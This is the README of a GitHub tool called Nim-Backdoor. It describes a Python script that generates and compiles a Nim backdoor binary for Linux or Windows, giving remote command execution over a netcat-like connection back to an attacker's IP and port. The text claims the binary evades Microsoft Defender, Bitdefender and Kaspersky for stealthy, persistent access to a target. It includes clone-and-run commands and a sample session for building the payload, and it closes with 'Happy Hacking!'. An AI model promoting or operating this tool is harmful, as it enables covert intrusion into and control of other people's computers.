The provided Python program, Nim-Backdoor.py, generates a Nim program that operates as a backdoor, allowing remote command execution via a netcat-like session. This tool is designed to work on both Linux and Windows systems. Notably, it has been engineered to bypass popular antivirus software such as Microsoft Defender, Bitdefender, and Kaspersky, making it a stealthy solution for maintaining a persistent connection to a target system.
Clone the Repository:
git clone https://github.com/malwarekid/Nim-Backdoor.git && cd Nim-Backdoor
Run the Script:
python3 Nim-Backdoor.py
python3 Nim-Backdoor.py
_ ___ ____ __ __
/ | / (_)___ ___ / __ \____ ______/ /______/ /___ ____ _____
/ |/ / / __ `__ \______/ __ / __ `/ ___/ //_/ __ / __ \/ __ \/ ___/
/ /| / / / / / / /_____/ /_/ / /_/ / /__/ ,< / /_/ / /_/ / /_/ / /
/_/ |_/_/_/ /_/ /_/ /_____/\__,_/\___/_/|_|\__,_/\____/\____/_/
By @malwarekid
Enter IP address: 192.168.1.1
Enter your Port number: 1234
Choose your OS (linux or windows): windows
Enter your output file name: Backdoor
Output saved as Backdoor
Enter Input Parameters:
IP Address: Enter the IP address for the netcat session.
Output File Name: Enter your desired output file name.
Output Executable: The script will generate a Nim program and compile it to a binary. The binary will be saved with the name you provided.
Ensure you have Python 3.6 or above and the Nim compiler installed on your system.
python3 Nim-Backdoor.py
When prompted, enter the IP address, port number, target OS, and output file name:
Enter IP address: 192.168.1.1
Enter your Port number: 1234
Choose your OS (linux or windows): windows
Enter your output file name: Backdoor
The script will generate a Nim program and compile it to a binary. The binary will be saved as Backdoor.
This project is licensed under the MIT License - see the LICENSE file for details.
Feel free to contribute, report issues, or provide feedback. Don't forget to follow me on Instagram and GitHub. Happy Hacking!
// click a file to view source